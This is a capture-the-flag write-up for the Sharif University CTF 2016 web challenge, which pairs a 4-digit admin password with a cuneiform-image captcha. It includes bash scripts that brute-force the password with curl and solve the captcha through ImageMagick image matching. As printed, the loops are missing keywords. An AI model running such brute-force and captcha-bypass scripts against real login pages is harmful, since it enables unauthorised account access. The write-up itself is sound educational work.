English [Sharif University CTF 2016] [Web 250 – Old persian cuneiform captcha] Write Up


Old Persian cuneiform is a semi-alphabetic cuneiform script that was the primary script for the old persian language. You could get more information on following links,
1- http://www.ancientscripts.com/oldpersian.html
2- https://en.wikipedia.org/wiki/Old_Persian_cuneiform.A web-based collections management for a museum has some extremely valuable information if one has admin user access.

The Site

We found that the “admin” user have a 4-digit password. But they use a captcha made of 10 old persian characters. One has to use the correspondence between symbols and strings to pass theye captcha verification (use “trans.png”).
Log in as “admin” to find the flag.
the flag is in the fomat: [Your flag is: flagflagflag…] (without braces)



We are before a very simple challenge, four digits bruteforce 🙂
Luckily they have thought to add a captcha.

Let’s start with the bruteforce code, after some testing, the errors messages are “Login failed” for a password error, and “Invalid captcha” for a captcha error.

We develop a small loop in bash, which will check the 10000 possible passwords.
The captcha value is recovered by a second script.


for passwd in {0000..9999}
  while [ $caperror == 1 ]
    rm -f *.jpg
    res=$(curl --retry 1000000 --connect-timeout 1 -s -L -b PHPSESSID=515386866780b5f132fc96c02b3ddb82 --data "username=admin&password=$passwd&captcha=$captcha" "http://ctf.sharif.edu:32455/chal/oldpersian/04b2dfb564086721/login/submit/")
    echo $res | grep -q "Invalid captcha" || caperror=0
  echo $res | grep -q "Login failed" || echo $passwd : $res
  echo test : $passwd

Let’s now the captcha recovery script, for that we put in the conv directory a picture for each letter.


Next we use the compare tool in the ImageMagick toolkit, with the phash metric.
This tool return a number based on the difference.

Ex1 : Differents pictures.

compare -metric phash 1-0.jpg conv/A.jpg NULL: 2>&1

Ex2 : Nearly same pictures.

compare -metric phash 1-0.jpg conv/F.jpg NULL: 2>&1

And the captcha script :

curl --retry 1000000 --connect-timeout 1 -b PHPSESSID=515386866780b5f132fc96c02b3ddb82 -s "http://ctf.sharif.edu:32455/chal/oldpersian/04b2dfb564086721/captcha/" > 1.jpg
mogrify -crop 80x80 +repage 1.jpg

ls *.jpg | while read char
  ls conv/ | while read char_conv; do compare -metric phash $char conv/$char_conv NULL: 2>&1 | grep -qE "^0.[0-9]*" && { echo -n $char_conv | sed 's/.jpg//'; break; }; done

We just have to run the bruteforce and … go on to something else.

test : 0000
test : 0001
test : 7473
test : 7474
test : 7475
7476 : Your flag is: 1a5bfab77002fc17e996ef292199885b

The validation flag is : 1a5bfab77002fc17e996ef292199885b

One thought on “[Sharif University CTF 2016] [Web 250 – Old persian cuneiform captcha] Write Up”

Leave a Reply

Your email address will not be published. Required fields are marked *